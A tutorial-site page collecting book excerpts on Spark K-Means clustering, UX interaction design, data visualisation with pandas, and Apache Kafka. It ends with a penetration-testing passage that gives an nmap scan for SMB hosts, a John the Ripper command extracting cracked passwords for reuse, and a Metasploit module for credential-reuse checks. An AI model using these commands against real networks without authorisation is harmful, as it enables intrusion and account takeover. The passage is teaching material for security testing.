How-To Tutorials

01 Mar 2018

7 min read

Implementing Apache Spark K-Means Clustering method on digital breath test data for road safety

This article is an excerpt taken from the book Mastering Apache Spark 2.x - Second Edition, written by Romeo Kienzler. In this book, you will learn to use Spark as a big data operating system, understand how to implement advanced analytics on the new APIs, and explore how easy it is to use Spark in day-to-day tasks.

In today’s tutorial, we use the road safety test data from our previous article to show how one can attempt to find clusters in data using the K-Means algorithm with Apache Spark MLlib.

Theory on Clustering

The K-Means algorithm iteratively attempts to determine clusters within the test data by minimizing the distance between the mean value of cluster center vectors and the new candidate cluster member vectors. The following equation assumes dataset members that range from X1 to Xn; it also assumes K cluster sets that range from S1 to Sk, where K <= n:

$$\underset{S}{\arg\min} \sum_{i=1}^{K} \sum_{X_j \in S_i} \lVert X_j - \mu_i \rVert^2$$

Here, μi is the mean of the vectors in Si.

K-Means in practice

The K-Means MLlib functionality processes its data as MLlib vectors (created here with Vectors.dense), so it needs numeric input data. As the same data from the last section is being reused, we will not explain the data conversion again. The only change that has been made in data terms in this section is that processing in HDFS will now take place under the /data/spark/kmeans/ directory. Additionally, the conversion Scala script for the K-Means example produces a record that is all comma-separated.

The development and processing for the K-Means example has taken place under the /home/hadoop/spark/kmeans directory to separate the work from other development. The sbt configuration file is now called kmeans.sbt and is identical to the last example, except for the project name:

    name := "K-Means"

The code for this section can be found in the software package under chapter7K-Means. So, looking at the code for kmeans1.scala, which is stored under kmeans/src/main/scala, some similar actions occur.
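To make the objective above concrete, here is a minimal, framework-free sketch of the classic assign-and-update iteration (Lloyd's algorithm) in Python. It is an illustration under stated assumptions, not MLlib's implementation: the initial centers are passed in explicitly instead of being chosen by k-means|| (KMeans.K_MEANS_PARALLEL), and the `epsilon` rule (stop once no center moves further than epsilon) only mirrors the intent of setEpsilon. The function names and the six sample points are hypothetical.

```python
import math
from typing import List, Sequence, Tuple

Point = Tuple[float, ...]


def squared_distance(a: Sequence[float], b: Sequence[float]) -> float:
    """Squared Euclidean distance ||a - b||^2."""
    return sum((x - y) ** 2 for x, y in zip(a, b))


def closest_center(point: Sequence[float], centers: Sequence[Point]) -> int:
    """Assignment step: index of the center nearest to `point`."""
    return min(range(len(centers)), key=lambda i: squared_distance(point, centers[i]))


def mean(points: Sequence[Point]) -> Point:
    """Update step: component-wise mean of a non-empty cluster."""
    return tuple(sum(coords) / len(points) for coords in zip(*points))


def lloyd_kmeans(points: Sequence[Point], initial_centers: Sequence[Point],
                 max_iterations: int = 50, epsilon: float = 1e-4) -> List[Point]:
    """Alternate assignment and update steps until the centers stop moving."""
    centers: List[Point] = [tuple(c) for c in initial_centers]
    for _ in range(max_iterations):
        # Assign every point to its nearest current center (the sets S_1..S_K).
        clusters: List[List[Point]] = [[] for _ in centers]
        for p in points:
            clusters[closest_center(p, centers)].append(p)
        # Move each center to the mean of its members; keep it if the cluster is empty.
        new_centers = [mean(c) if c else centers[i] for i, c in enumerate(clusters)]
        largest_move = max(math.sqrt(squared_distance(old, new))
                           for old, new in zip(centers, new_centers))
        centers = new_centers
        if largest_move <= epsilon:
            break
    return centers


points = [(1.0, 1.0), (1.5, 2.0), (1.0, 1.5), (8.0, 8.0), (8.5, 9.0), (9.0, 8.0)]
centers = lloyd_kmeans(points, initial_centers=[points[0], points[3]])
print(centers)
```

Each pass can only lower (or keep) the sum of squared distances in the equation above, which is why the loop converges; the choice of starting centers is what K_MEANS_PARALLEL improves on.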
The import statements refer to the Spark context and configuration. This time, however, the K-Means functionality is being imported from MLlib. Additionally, the application class name has been changed for this example to kmeans1:

    import org.apache.spark.SparkContext
    import org.apache.spark.SparkContext._
    import org.apache.spark.SparkConf
    import org.apache.spark.mllib.linalg.Vectors
    import org.apache.spark.mllib.clustering.{KMeans,KMeansModel}

    object kmeans1 extends App {

The same actions are being taken as in the last example to define the data file, define the Spark configuration, and create a Spark context:

    val hdfsServer = "hdfs://localhost:8020"
    val hdfsPath = "/data/spark/kmeans/"
    val dataFile = hdfsServer + hdfsPath + "DigitalBreathTestData2013-MALE2a.csv"
    val sparkMaster = "spark://localhost:7077"
    val appName = "K-Means 1"
    val conf = new SparkConf()
    conf.setMaster(sparkMaster)
    conf.setAppName(appName)
    val sparkCxt = new SparkContext(conf)

Next, the CSV data is loaded from the data file, and each line is split on commas into a dense vector, giving the VectorData RDD:

    val csvData = sparkCxt.textFile(dataFile)
    val VectorData = csvData.map { csvLine =>
      Vectors.dense(csvLine.split(',').map(_.toDouble))
    }

A KMeans object is initialized, and parameters are defined for the number of clusters and the maximum number of iterations used to determine them:

    val kMeans = new KMeans
    val numClusters = 3
    val maxIterations = 50

Some default values are defined for the initialization mode, number of runs, and epsilon, which we needed for the K-Means call but did not vary for the processing. Finally, these parameters were set against the KMeans object:

    val initializationMode = KMeans.K_MEANS_PARALLEL
    val numRuns = 1
    val numEpsilon = 1e-4
    kMeans.setK(numClusters)
    kMeans.setMaxIterations(maxIterations)
    kMeans.setInitializationMode(initializationMode)
    kMeans.setRuns(numRuns)
    kMeans.setEpsilon(numEpsilon)

We cached the training vector data to improve performance and trained the KMeans object on it to create a K-Means model:

    VectorData.cache
    val kMeansModel = kMeans.run(VectorData)

We then computed the K-Means cost and the number of input data rows, and output the results via println statements. The cost value indicates how tightly the data points are packed around their cluster centers:

    val kMeansCost = kMeansModel.computeCost(VectorData)
    println("Input data rows : " + VectorData.count())
    println("K-Means Cost : " + kMeansCost)

Next, we used the K-Means model to print the cluster centers as vectors for each of the three clusters that were computed:

    kMeansModel.clusterCenters.foreach { println }

Finally, we use the K-Means model's predict function to create a list of cluster membership predictions. We then count these predictions by value to give a count of the data points in each cluster. This shows which clusters are bigger and whether there really are three clusters:

    val clusterRddInt = kMeansModel.predict(VectorData)
    val clusterCount = clusterRddInt.countByValue
    clusterCount.toList.foreach { println }

    } // end object kmeans1

To run this application, it must be compiled and packaged from the kmeans subdirectory, as the Linux pwd command shows here:

    [hadoop@hc2nn kmeans]$ pwd
    /home/hadoop/spark/kmeans
    [hadoop@hc2nn kmeans]$ sbt package
    Loading /usr/share/sbt/bin/sbt-launch-lib.bash
    [info] Set current project to K-Means (in build file:/home/hadoop/spark/kmeans/)
    [info] Compiling 2 Scala sources to /home/hadoop/spark/kmeans/target/scala-2.10/classes...
    [info] Packaging /home/hadoop/spark/kmeans/target/scala-2.10/k-means_2.10-1.0.jar ...
    [info] Done packaging.
    [success] Total time: 20 s, completed Feb 19, 2015 5:02:07 PM

Once packaging succeeds, we check HDFS to ensure that the test data is ready. As in the last example, we convert our data to numeric form using the convert.scala file provided in the software package. We will process the DigitalBreathTestData2013-MALE2a.csv data file in the HDFS directory /data/spark/kmeans, as follows:

    [hadoop@hc2nn nbayes]$ hdfs dfs -ls /data/spark/kmeans
    Found 3 items
    -rw-r--r--   3 hadoop supergroup   24645166 2015-02-05 21:11 /data/spark/kmeans/DigitalBreathTestData2013-MALE2.csv
    -rw-r--r--   3 hadoop supergroup    5694226 2015-02-05 21:48 /data/spark/kmeans/DigitalBreathTestData2013-MALE2a.csv
    drwxr-xr-x   - hadoop supergroup          0 2015-02-05 21:46 /data/spark/kmeans/result

The spark-submit tool is used to run the K-Means application. The only change in this command is that the class is now kmeans1:

    spark-submit --class kmeans1 --master spark://localhost:7077 --executor-memory 700M --total-executor-cores 100 /home/hadoop/spark/kmeans/target/scala-2.10/k-means_2.10-1.0.jar

The output from the Spark cluster run is as follows:

    Input data rows : 467054
    K-Means Cost : 5.40312223450789E7

The previous output shows the input data volume, which looks correct; it also shows the K-Means cost value. The cost is based on the Within Set Sum of Squared Errors (WSSSE), which measures how well the cluster centroids found match the distribution of the data points: the better they match, the lower the cost. The following link, https://datasciencelab.wordpress.com/2013/12/27/finding-the-k-in-k-means-clustering/, explains WSSSE and how to find a good value for k in more detail.

Next come the three vectors, which describe the data cluster centers with the correct number of dimensions.
Remember that these cluster centroid vectors will have the same number of columns as the original vector data:

    [0.24698249738061878,1.3015883142472253,0.005830116872250263,2.9173747788555207,1.156645130895448,3.4400290524342454]
    [0.3321793984152627,1.784137241326256,0.007615970459266097,2.5831987075928917,119.58366028156011,3.8379106085083468]
    [0.25247226760684494,1.702510963969387,0.006384899819416975,2.231404248000688,52.202897927594805,3.551509158139135]

Finally, cluster membership is given for clusters 1 to 3, with cluster 1 (index 0) having the largest membership at 407539 member vectors:

    (0,407539)
    (1,12999)
    (2,46516)

To summarize, we saw a practical example that shows how the K-Means algorithm is used to cluster data with the help of Apache Spark. If you found this post useful, do check out the book Mastering Apache Spark 2.x - Second Edition to learn about the latest enhancements in Apache Spark 2.x, such as interactive querying of live data and unifying DataFrames and Datasets.
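The WSSSE cost and the per-cluster counts reported in this tutorial can be reproduced on a toy scale. The following Python sketch assumes the cost is the sum of squared Euclidean distances from each point to its nearest center (which is how MLlib describes computeCost), and it uses collections.Counter in place of countByValue. The helper names, the six points, and the two centers are made up for illustration.

```python
from collections import Counter
from typing import Sequence, Tuple

Point = Tuple[float, ...]


def squared_distance(a: Sequence[float], b: Sequence[float]) -> float:
    """Squared Euclidean distance ||a - b||^2."""
    return sum((x - y) ** 2 for x, y in zip(a, b))


def predict(point: Sequence[float], centers: Sequence[Point]) -> int:
    """Index of the nearest center, analogous to KMeansModel.predict."""
    return min(range(len(centers)), key=lambda i: squared_distance(point, centers[i]))


def wssse(points: Sequence[Point], centers: Sequence[Point]) -> float:
    """Within Set Sum of Squared Errors: lower means tighter clusters."""
    return sum(squared_distance(p, centers[predict(p, centers)]) for p in points)


def cluster_sizes(points: Sequence[Point], centers: Sequence[Point]) -> Counter:
    """Number of points per cluster index, analogous to countByValue."""
    return Counter(predict(p, centers) for p in points)


points = [(1.0, 1.0), (1.5, 2.0), (1.0, 1.5), (8.0, 8.0), (8.5, 9.0), (9.0, 8.0)]
centers = [(7 / 6, 1.5), (8.5, 25 / 3)]  # the means of the two groups of points
print("K-Means Cost :", wssse(points, centers))
print(sorted(cluster_sizes(points, centers).items()))  # [(0, 3), (1, 3)]
```

Because WSSSE keeps falling as K grows (it reaches zero when every point is its own cluster), it is best used to compare runs with the same K or to look for an "elbow" across several values of K, as the linked article discusses.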

Packt

21 Mar 2014

9 min read

Make phone calls and send SMS messages from your website using Twilio

Sugandha Lahoti

16 Oct 2018

2 min read

Why Motion and Interaction matter in a UX design? [Video]

Designing prototypes is a great way to extend your sketching skills and to test the products you’ve been building. In particular, user experience prototyping solves problems for users and infuses user needs into conversations, which eventually helps build better products and services. Motion and interaction are part of user experience prototyping. Motion helps to reinforce and explore what the interaction design is like, and prototyping interactions helps us define how a product works. This clip is taken from the video Advanced UX Techniques by Chris R. Becker. In this course, you will explore UX techniques such as sketching, wireframes, and high-fidelity prototypes.

https://www.youtube.com/watch?v=TTpxvuIBFwE

Interaction Design (IxD) is the design of interactive products and services in which the designer focuses on the way users will interact with them. In this video, we’ll explore the following five aspects of interaction design:

- Words: Do users understand, read, and use the shape?
- Objects: Do users recognize and use the shapes, for example, whether it’s a phone or a keyboard?
- Time: The time users take to accomplish a task (are they reading a long article?)
- Behavior: How do users respond or react to anything that app designers make them do?
- Visuals: Do users like what they see?

As you iterate on the prototypes of your app, you should evaluate them against these aspects of your interaction design. The role of interaction design is to define the ways a user can interact. Interactions can be complex, so designers should think carefully about how the systems are interconnected. Interactions are learned and can be improved through animations. Watch the clip above to learn more about why motion and interaction design are key aspects of UX design.

About the Author

Chris R. Becker is an imaginative and creative Sr. UX designer/IxD/design thinker and educator. He designs across media platforms from the web to iOS and Android, as well as SaaS and service design.
He leads design thinking workshops and UX deliverables, all the while using communication skills both in the classroom and for client presentations.

Aaron Lazar

28 Jan 2018

11 min read

Getting Started with Data Storytelling

This article has been taken from the book Principles of Data Science, written by Sinan Ozdemir. It aims to practically introduce you to the different ways in which you can communicate or visualize your data to tell stories effectively.

Communication matters

Being able to conduct experiments and manipulate data in a coding language is not enough to conduct practical and applied data science. This is because data science is, generally, only as good as how it is used in practice. For instance, a medical data scientist might be able to predict the chance of a tourist contracting malaria in developing countries with >98% accuracy; however, if these results are published in a poorly marketed journal and online mentions of the study are minimal, their groundbreaking results, which could potentially prevent deaths, would never see the true light of day. For this reason, communication of results through data storytelling is arguably as important as the results themselves.

A famous example of poor management of the distribution of results is the case of Gregor Mendel. Mendel is widely recognized as one of the founders of modern genetics. However, his results (including data and charts) were not well adopted until after his death. Mendel even sent them to Charles Darwin, who largely ignored Mendel's papers, which were published in little-known Moravian journals.

Generally, there are two ways of presenting results: verbal and visual. Of course, both the verbal and visual forms of communication can be broken down into dozens of subcategories, including slide decks, charts, journal papers, and even university lectures. However, we can find common elements of data presentation that can make anyone in the field more aware and effective in their communication skills. Let's dive right into effective (and ineffective) forms of communication, starting with visuals.
We’ll look at five basic types of graphs: scatter plots, line graphs, bar charts, histograms, and box plots.

Scatter plots

A scatter plot is probably one of the simplest graphs to create. It is made by creating two quantitative axes and using data points to represent observations. The main goal of a scatter plot is to highlight relationships between two variables and, if possible, reveal a correlation.

For example, we can look at two variables: average hours of TV watched in a day and a 0-100 scale of work performance (0 being very poor performance and 100 being excellent performance). The goal here is to find a relationship (if it exists) between watching TV and average work performance.

The following code simulates a survey of a few people, in which they revealed the average amount of television they watched in a day against a company-standard work performance metric:

    import pandas as pd
    hours_tv_watched = [0, 0, 0, 1, 1.3, 1.4, 2, 2.1, 2.6, 3.2, 4.1, 4.4, 4.4, 5]

This line of code creates 14 sample survey results of people answering the question of how many hours of TV they watch in a day.

    work_performance = [87, 89, 92, 90, 82, 80, 77, 80, 76, 85, 80, 75, 73, 72]

This line of code creates 14 new sample survey results of the same people being rated on their work performance on a scale from 0 to 100. For example, the first person watched 0 hours of TV a day and was rated 87/100 on their work, while the last person watched, on average, 5 hours of TV a day and was rated 72/100.

    df = pd.DataFrame({'hours_tv_watched': hours_tv_watched, 'work_performance': work_performance})

Here, we are creating a DataFrame in order to ease our exploratory data analysis and make it easier to make a scatter plot:

    df.plot(x='hours_tv_watched', y='work_performance', kind='scatter')

Now, we are actually making our scatter plot.
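Alongside the plot, the strength of the linear relationship in this simulated survey can be put into a single number. The following sketch computes the Pearson correlation coefficient in plain Python on the same two lists; the function name pearson_r is our own, not part of pandas. A value near -1 means a strong negative linear association, near 0 means none, and near +1 a strong positive one.

```python
import math
from typing import Sequence


def pearson_r(xs: Sequence[float], ys: Sequence[float]) -> float:
    """Pearson correlation coefficient of two equal-length samples."""
    if len(xs) != len(ys) or len(xs) < 2:
        raise ValueError("need two samples of the same length (n >= 2)")
    mean_x = sum(xs) / len(xs)
    mean_y = sum(ys) / len(ys)
    # Sum of co-deviations, divided by the root of the two sums of squared deviations.
    cov = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    var_x = sum((x - mean_x) ** 2 for x in xs)
    var_y = sum((y - mean_y) ** 2 for y in ys)
    return cov / math.sqrt(var_x * var_y)


hours_tv_watched = [0, 0, 0, 1, 1.3, 1.4, 2, 2.1, 2.6, 3.2, 4.1, 4.4, 4.4, 5]
work_performance = [87, 89, 92, 90, 82, 80, 77, 80, 76, 85, 80, 75, 73, 72]
r = pearson_r(hours_tv_watched, work_performance)
print(f"Pearson r = {r:.2f}")
```

With the DataFrame from above, pandas gives the same figure via df['hours_tv_watched'].corr(df['work_performance']), since Series.corr uses the Pearson method by default. Either way, the number only describes association; it says nothing about causation.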
In the following plot, we can see that our axes represent the number of hours of TV watched in a day and the person's work performance metric:

Each point on a scatter plot represents a single observation (in this case, a person), and its location is a result of where the observation stands on each variable. This scatter plot does seem to show a relationship, which suggests that the more TV we watch in a day, the lower our work performance tends to be. Of course, as we are now experts in statistics from the last two chapters, we know that this might not be causal. A scatter plot may only work to reveal a correlation or an association between two variables, not causation. Advanced statistical tests, such as the ones we saw in Chapter 8, Advanced Statistics, might work to reveal causation. Later on in this chapter, we will see the damaging effects that trusting correlation might have.

Line graphs

Line graphs are, perhaps, one of the most widely used graphs in data communication. A line graph simply uses lines to connect data points and usually represents time on the x axis. Line graphs are a popular way to show changes in variables over time. The line graph, like the scatter plot, is used to plot quantitative variables.

As a great example, many of us wonder about the possible links between what we see on TV and our behavior in the world. A friend of mine once took this thought to an extreme: he wondered if he could find a relationship between the TV show The X-Files and the number of UFO sightings in the U.S. He found the number of UFO sightings per year and plotted them over time. He then added a quick graphic to ensure that readers would be able to identify the point in time when The X-Files premiered:

It appears to be clear that right after 1993, the year of The X-Files premiere, the number of UFO sightings started to climb drastically. This graphic, albeit light-hearted, is an excellent example of a simple line graph.
We are told what each axis measures, we can quickly see a general trend in the data, and we can identify with the author's intent, which is to show a relationship between the number of UFO sightings and The X-Files premiere.

On the other hand, the following is a less impressive line chart:

This line graph attempts to highlight the change in the price of gas by plotting three points in time. At first glance, it is not much different from the previous graph: we have time on the bottom x axis and a quantitative value on the vertical y axis. The (not so) subtle difference here is that the three points are equally spaced out on the x axis; however, if we read their actual time indications, they are not equally spaced out in time. A year separates the first two points, whereas a mere 7 days separates the last two points.

Bar charts

We generally turn to bar charts when trying to compare variables across different groups. For example, we can plot the number of countries per continent using a bar chart. Note how the x axis does not represent a quantitative variable; in fact, when using a bar chart, the x axis is generally a categorical variable, while the y axis is quantitative. Note that, for this code, I am using the World Health Organization's report on alcohol consumption around the world by country:

    import matplotlib.pyplot as plt
    drinks = pd.read_csv('data/drinks.csv')
    drinks.continent.value_counts().plot(kind='bar', title='Countries per Continent')
    plt.xlabel('Continent')
    plt.ylabel('Count')

The following graph shows us a count of the number of countries in each continent. We can see the continent code at the bottom of the bars, and the bar height represents the number of countries we have in each continent.
For example, we see that Africa has the most countries represented in our survey, while South America has the least:

In addition to the count of countries, we can also plot the average beer servings per continent using a bar chart, as shown:

    drinks.groupby('continent').beer_servings.mean().plot(kind='bar')

Note how a scatter plot or a line graph would not be able to support this data because they can only handle quantitative variables; bar graphs have the ability to demonstrate categorical values. We can also use bar charts to graph variables that change over time, like a line graph.

Histograms

Histograms show the frequency distribution of a single quantitative variable by splitting up the data, by range, into equidistant bins and plotting the raw count of observations in each bin. A histogram is effectively a bar chart where the x axis is a bin (subrange) of values and the y axis is a count. As an example, I will import a store's daily number of unique customers, as shown:

    rossmann_sales = pd.read_csv('data/rossmann.csv')
    rossmann_sales.head()

Note how we have data for multiple stores (identified by the first column, Store). Let's subset this data for only the first store, as shown:

    first_rossmann_sales = rossmann_sales[rossmann_sales['Store'] == 1]

Now, let's plot a histogram of the first store's customer count:

    first_rossmann_sales['Customers'].hist(bins=20)
    plt.xlabel('Customer Bins')
    plt.ylabel('Count')

The x axis is now categorical in that each category is a selected range of values; for example, 600-620 customers would potentially be a category. The y axis, like a bar chart, is plotting the number of observations in each category. In this graph, for example, one might take away the fact that most of the time, the number of customers on any given day will fall between 500 and 700. Altogether, histograms are used to visualize the distribution of values that a quantitative variable can take on.

Box plots

Box plots are also used to show a distribution of values.
They are created by plotting the five-number summary, as follows:

- The minimum value
- The first quartile (the number that separates the 25% lowest values from the rest)
- The median
- The third quartile (the number that separates the 25% highest values from the rest)
- The maximum value

In pandas, when we create box plots, the red line denotes the median, the top of the box (or the right, if it is horizontal) is the third quartile, and the bottom (left) part of the box is the first quartile. The following is a series of box plots showing the distribution of beer consumption according to continent:

    drinks.boxplot(column='beer_servings', by='continent')

Now, we can clearly see the distribution of beer consumption across the continents and how they differ. Africa and Asia have a much lower median beer consumption than Europe or North America. Box plots also have the added bonus of being able to show outliers much better than a histogram. This is because the minimum and maximum are part of the box plot.

Getting back to the customer data, let's look at the same store customer numbers, but using a box plot:

    first_rossmann_sales.boxplot(column='Customers', vert=False)

This is the exact same data as plotted earlier in the histogram; however, now it is shown as a box plot. For the purpose of comparison, I will show you both graphs one after the other:

Note how the x axis for each graph is the same, ranging from 0 to 1,200. The box plot is much quicker at giving us the center of the data (the red line is the median), while the histogram works much better in showing us how spread out the data is and where the biggest bins are. For example, the histogram reveals that there is a very large bin at zero customers. This means that for a little over 150 days of data, there were zero customers.
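Both views compared above summarize the same distribution in different ways. As a rough sketch of what they compute, the following pure-Python functions count values into equal-width bins (similar in spirit to hist(bins=...)) and derive the five-number summary. The quartiles use linear interpolation between neighboring ranks, which is the default of pandas' quantile() and therefore of describe(). The function names are our own, and the daily customer counts are made up rather than taken from the Rossmann data.

```python
from typing import Dict, List, Sequence, Tuple


def equal_width_histogram(values: Sequence[float], bins: int) -> Tuple[List[float], List[int]]:
    """Split [min, max] into `bins` equal-width bins and count the values in each.

    Returns (edges, counts); edges has bins + 1 entries. The last bin is closed
    on the right so that the maximum value is counted.
    """
    lo, hi = min(values), max(values)
    width = (hi - lo) / bins if hi > lo else 1.0
    edges = [lo + i * width for i in range(bins + 1)]
    counts = [0] * bins
    for v in values:
        index = int((v - lo) / width)
        counts[min(index, bins - 1)] += 1  # the maximum falls into the last bin
    return edges, counts


def quantile(sorted_values: Sequence[float], q: float) -> float:
    """Quantile of already-sorted data, interpolating linearly between ranks."""
    position = (len(sorted_values) - 1) * q
    lower = int(position)
    upper = min(lower + 1, len(sorted_values) - 1)
    fraction = position - lower
    return sorted_values[lower] + (sorted_values[upper] - sorted_values[lower]) * fraction


def five_number_summary(values: Sequence[float]) -> Dict[str, float]:
    """Minimum, first quartile, median, third quartile, and maximum."""
    s = sorted(values)
    return {"min": s[0], "25%": quantile(s, 0.25), "50%": quantile(s, 0.5),
            "75%": quantile(s, 0.75), "max": s[-1]}


daily_customers = [0, 0, 463, 500, 529, 560, 598, 650, 1130]  # made-up sample
edges, counts = equal_width_histogram(daily_customers, bins=4)
print(edges, counts)
print(five_number_summary(daily_customers))
```

The histogram keeps the two zero-customer days visible as their own bar, while the five-number summary compresses them into the minimum, which mirrors the trade-off described above.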
Note that we can get the exact numbers to construct a box plot using the describe feature in pandas, as shown:

    first_rossmann_sales['Customers'].describe()

    min       0.000000
    25%     463.000000
    50%     529.000000
    75%     598.750000
    max    1130.000000

There we have it! We just learned data storytelling through various techniques like scatter plots, line graphs, bar charts, histograms, and box plots. Now you’ve got the power to be creative in the way you tell tales of your data! If you found our article useful, you can check out Principles of Data Science for more interesting data science tips and techniques.

Packt

10 Oct 2013

6 min read

Introducing Kafka

In today's world, real-time information is continuously generated by applications (business, social, or any other type), and this information needs easy ways to be reliably and quickly routed to multiple types of receivers. Most of the time, applications that produce information and applications that consume it are well apart and inaccessible to each other. This at times leads to the redevelopment of information producers or consumers to provide an integration point between them. Therefore, a mechanism is required for the seamless integration of information producers and consumers that avoids rewriting an application at either end.

In the present era of big data, the first challenge is to collect the data and the second challenge is to analyze it. As it is a huge amount of data, the analysis typically includes the following and much more:

- User behavior data
- Application performance tracing
- Activity data in the form of logs
- Event messages

Message publishing is a mechanism for connecting various applications with the help of messages that are routed between them, for example, by a message broker such as Kafka. Kafka is a solution to the real-time problems of any software solution, that is, dealing with real-time volumes of information and routing them to multiple consumers quickly. Kafka provides seamless integration between information producers and consumers without blocking the producers of the information and without letting producers know who the final consumers are.

Apache Kafka is an open source, distributed publish-subscribe messaging system, mainly designed with the following characteristics:

- Persistent messaging: To derive the real value from big data, any kind of information loss cannot be afforded. Apache Kafka is designed with O(1) disk structures that provide constant-time performance even with very large volumes of stored messages, on the order of terabytes.
- High throughput: Keeping big data in mind, Kafka is designed to work on commodity hardware and to support millions of messages per second.
- Distributed: Apache Kafka explicitly supports message partitioning over Kafka servers and distributing consumption over a cluster of consumer machines while maintaining per-partition ordering semantics.
- Multiple client support: The Apache Kafka system supports easy integration of clients from different platforms such as Java, .NET, PHP, Ruby, and Python.
- Real time: Messages produced by the producer threads should be immediately visible to consumer threads; this feature is critical to event-based systems such as Complex Event Processing (CEP) systems.

Kafka provides a real-time publish-subscribe solution that overcomes the challenges of real-time data usage for consumption, for data volumes that may grow by orders of magnitude larger than the real data. Kafka also supports parallel data loading into Hadoop systems.
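The partitioning and per-partition ordering described above can be illustrated with a toy, in-memory model. This is not the Kafka client API: ToyTopic, ToyConsumer, and the CRC32-modulo partitioner are hypothetical stand-ins (Kafka's own default partitioner uses a murmur2 hash of the key). The sketch shows three properties: messages with the same key land in the same partition, order is preserved within a partition, and each consumer tracks its own offset, so producers never need to know who reads their messages.

```python
import zlib
from collections import defaultdict
from typing import Dict, List, Tuple

Record = Tuple[str, str]  # (key, value)


class ToyTopic:
    """Toy stand-in for a partitioned topic: each partition is an append-only list."""

    def __init__(self, num_partitions: int) -> None:
        self.partitions: List[List[Record]] = [[] for _ in range(num_partitions)]

    def partition_for(self, key: str) -> int:
        # Hypothetical partitioner: deterministic CRC32 of the key modulo partition count.
        return zlib.crc32(key.encode("utf-8")) % len(self.partitions)

    def produce(self, key: str, value: str) -> Tuple[int, int]:
        """Append a record and return (partition, offset); never waits for consumers."""
        p = self.partition_for(key)
        self.partitions[p].append((key, value))
        return p, len(self.partitions[p]) - 1


class ToyConsumer:
    """Reads partitions independently, remembering its own offset per partition."""

    def __init__(self, topic: ToyTopic) -> None:
        self.topic = topic
        self.offsets: Dict[int, int] = defaultdict(int)

    def poll(self, partition: int, max_records: int = 10) -> List[Record]:
        start = self.offsets[partition]
        records = self.topic.partitions[partition][start:start + max_records]
        self.offsets[partition] = start + len(records)
        return records


topic = ToyTopic(num_partitions=3)
for i in range(3):
    topic.produce("user-42", f"click-{i}")
p = topic.partition_for("user-42")
analytics, alerting = ToyConsumer(topic), ToyConsumer(topic)
print(analytics.poll(p))  # user-42's clicks, in the order they were produced
print(alerting.poll(p))   # a second consumer reads the same records independently
```

CRC32 is used instead of Python's built-in hash() because string hashing is randomized per process, which would send the same key to different partitions across runs.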
The following diagram shows a typical big data aggregation-and-analysis scenario supported by the Apache Kafka messaging system:

At the production side, there are different kinds of producers, such as the following:

- Frontend web applications generating application logs
- Producer proxies generating web analytics logs
- Producer adapters generating transformation logs
- Producer services generating invocation trace logs

At the consumption side, there are different kinds of consumers, such as the following:

- Offline consumers that consume messages and store them in Hadoop or a traditional data warehouse for offline analysis
- Near real-time consumers that consume messages and store them in any NoSQL datastore, such as HBase or Cassandra, for near real-time analytics
- Real-time consumers that filter messages in the in-memory database and trigger alert events for related groups

Need for Kafka

A large amount of data is generated by companies having any form of web-based presence and activity. Data is one of the newer ingredients in these Internet-based systems. This data typically includes user-activity events corresponding to logins, page visits, clicks, and social networking activities such as likes, sharing, and comments, as well as operational and system metrics. Because of its high throughput (millions of messages per second), this data is typically handled by logging and traditional log aggregation solutions. These traditional solutions are viable for providing logging data to an offline analysis system such as Hadoop. However, they are very limiting for building real-time processing systems.

According to the new trends in Internet applications, activity data has become a part of production data and is used to run analytics in real time.
These analytics can be:

- Search based on relevance
- Recommendations based on popularity, co-occurrence, or sentiment analysis
- Delivering advertisements to the masses
- Internet application security from spam or unauthorized data scraping

Real-time usage of these multiple sets of data collected from production systems has become a challenge because of the volume of data collected and processed. Apache Kafka aims to unify offline and online processing by providing a mechanism for parallel load into Hadoop systems as well as the ability to partition real-time consumption over a cluster of machines. Kafka can be compared with Scribe or Flume, as it is useful for processing activity stream data; but from an architecture perspective, it is closer to traditional messaging systems such as ActiveMQ or RabbitMQ.

A few Kafka usages

Some of the companies that are using Apache Kafka in their respective use cases are as follows:

- LinkedIn (www.linkedin.com): Apache Kafka is used at LinkedIn for the streaming of activity data and operational metrics. This data powers various products such as LinkedIn news feed and LinkedIn Today, in addition to offline analytics systems such as Hadoop.
- DataSift (www.datasift.com/): At DataSift, Kafka is used as a collector for monitoring events and as a tracker of users' consumption of data streams in real time.
- Twitter (www.twitter.com/): Twitter uses Kafka as a part of Storm, its stream-processing infrastructure.
- Foursquare (www.foursquare.com/): Kafka powers online-to-online and online-to-offline messaging at Foursquare. It is used to integrate Foursquare monitoring and production systems with Foursquare's Hadoop-based offline infrastructure.
- Square (www.squareup.com/): Square uses Kafka as a bus to move all system events through Square's various datacenters. This includes metrics, logs, custom events, and so on. On the consumer side, it outputs into Splunk, Graphite, or Esper-like real-time alerting.
The source of the above information is https://cwiki.apache.org/confluence/display/KAFKA/Powered+By.

Summary

In this article, we have seen how companies are evolving the mechanism of collecting and processing application-generated data, and of utilizing the real power of this data by running analytics over it.

Packt

24 Sep 2015

15 min read

Exploiting Services with Python

In this article by Christopher Duffy, author of the book Learning Python Penetration Testing, we will learn about testing for the synchronization of account credentials. One of the big misconceptions today is the prevalence of exploitable vulnerabilities. You will still find vulnerabilities that can be exploited by overflowing the stack or heap; they are just significantly reduced in number or more complex to exploit.

Testing for the synchronization of account credentials

With these results, we can determine if any of these credentials are reused in the network. We know there are primarily Windows hosts in the target network, but we need to identify which ones have port 445 open. We can then try to determine which accounts might grant us access. First, the following command is run:

    nmap -sS -vvv -p445 192.168.195.0/24 -oG output

Then, parse the results for open ports with the following command, which will provide a file of target hosts with Server Message Block (SMB) enabled:

    grep 445/open output | cut -d" " -f2 >> smb_hosts

The passwords can be extracted directly from John and written to a password file that can be used for follow-on service attacks:

    john --show unshadowed | cut -d: -f2 | grep -v " " > passwords

Always test on a single host the first time you run this type of attack. In this example, we are using the sys account, but it is more common to use the root account or similar administrative accounts to test password reuse (synchronization) in an environment.

The following attack, using auxiliary/scanner/smb/smb_enumusers_domain, will check for two things: it will identify which systems this account has access to, and the relevant users that are currently logged into those systems. In the second portion of this example, we will highlight how to identify the accounts that are actually privileged and part of the Domain.

There are good points and bad points about the smb_enumusers_domain module.
